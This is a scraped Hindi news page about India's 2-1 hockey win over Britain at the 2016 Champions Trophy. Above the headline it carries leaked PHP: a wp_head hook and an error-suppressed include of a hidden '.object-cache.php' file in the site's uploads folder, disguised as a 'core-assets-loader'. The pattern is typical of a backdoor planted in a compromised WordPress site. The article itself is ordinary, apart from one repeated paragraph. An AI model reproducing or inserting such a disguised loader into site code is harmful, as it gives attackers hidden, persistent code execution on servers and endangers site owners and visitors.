add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); भारत ने ब्रिटेन को दी पटखनी, चैम्पियंस ट्रॉफी में 2-1 से हराया – SOCH INDIA
Menu

खेल
भारत ने ब्रिटेन को दी पटखनी, चैम्पियंस ट्रॉफी में 2-1 से हराया

nobanner

लंदन। भारतीय हॉकी टीम ने चैम्पियंस ट्रॉफी -2016 के अपने दूसरे पूल मैच में शनिवार को ब्रिटेन को 2-1 से हराकर लगातार दूसरी जीत हासिल की। भारत ने इस मुकाबले में शानदार खेल दिखाया। भारत के लिए मनदीप सिंह और हरमनप्रीत सिंह ने गोल किए। वहीं, ब्रिटेन के लिए एक मात्र गोल एशले जैक्शन ने किया।

भारत की इस जीत का श्रेय टीम के गोलकीपर पी.आर. श्रीजेश को भी जाता है, जिन्होंने अपनी शानदार गोलीकीपिंग से कई बेहतरीन बचाव किए और ब्रिटेन को गोल से महरूम रखा। बारिश के कारण मैच 20 मिनट देरी से शुरू हुआ। मेजबानों ने शुरू से ही भारत पर हमले बोले। श्रीजेश ने हालांकि दो शानदार बचाव करते हुए गोल नहीं होने दिए। लेकिन इसके बाद भारत ने मैच पर अपनी पकड़ बनानी शुरू कर दी।

भारत ने ब्रिटेन को दी पटखनी, चैम्पियंस ट्रॉफी में 2-1 से हराया
भारतीय हॉकी टीम ने चैम्पियंस ट्रॉफी -2016 के अपने दूसरे पूल मैच में शनिवार को ब्रिटेन को 2-1 से हराकर लगातार दूसरी जीत हासिल की। भारत ने इस मुकाबले में शानदार खेल दिखाया।

मैच का पहला गोल भारत के मनदीप ने किया। मैच के 17वें मिनट में मनदीप ने एस.वी सुनील के पास को गोलपोस्ट में डाल भारत को एक गोल से आगे कर दिया। मेजबानों ने बराबरी करने की कोशिश की, लेकिन भारतीय रक्षापंक्ति ने उन्हें कामयाब नहीं होने दिया। इसी बीच ब्रिटेन की मुसीबत उस समय और बढ़ गई जब भारत को 34वें मिनट में पेनाल्टी स्ट्रोक मिला। हरमनप्रीत ने इस मौके को गोल में तब्दील कर भारत को 2-0 से आगे कर दिया।

दो गोल से पीछे चल रही ब्रिटेन को 35वें मिनट में पेनाल्टी कॉर्नर मिला, जिसे एशले जैक्शन ने गोल में बदल कर टीम को कुछ राहत की सांस दी। इसके बाद ब्रिटेन की टीम ने कई बार हमला किया, लेकिन श्रीजेश और भारतीय रक्षापंक्ति ने उनके अरमान पूरे नहीं होने दिए।